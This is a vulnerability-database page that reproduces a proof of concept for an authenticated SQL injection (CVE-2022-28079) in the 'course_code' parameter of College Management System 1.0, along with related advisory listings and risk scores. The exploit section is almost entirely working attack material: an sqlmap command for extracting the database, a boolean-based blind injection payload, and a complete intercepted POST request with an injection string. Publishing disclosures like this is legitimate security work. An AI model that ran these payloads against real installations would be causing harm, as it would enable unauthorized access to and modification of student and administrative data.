Vulners
Lucene search
College Management System 1.0 - 'course_code' SQL Injection (Authenticated)
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Travel Management System 1.0 Multiple SQL Injection Vulnerability | 8 May 202200:00 | – | zdt |
 | CVE-2022-28079 | 5 May 202217:15 | – | attackerkb |
 | CVE-2022-28079 | 4 Nov 202400:00 | – | circl |
 | College Management System SQL注入漏洞 | 5 May 202200:00 | – | cnnvd |
 | College Management System SQL Injection Vulnerability | 9 May 202200:00 | – | cnvd |
 | CVE-2022-28079 | 5 May 202215:31 | – | cve |
 | CVE-2022-28079 | 5 May 202215:31 | – | cvelist |
 | College Management System 1.0 - SQL Injection | 24 Jun 202603:02 | – | nuclei |
 | CVE-2022-28079 | 5 May 202217:15 | – | nvd |
 | CVE-2022-28079 | 5 May 202217:15 | – | osv |
10
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
------------------------------------------------------------------------------------
1. Description:
----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
4. Burpsuite request:
----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27nsData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 May 2022 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.5
CVSS 3.18.8
EPSS0.28285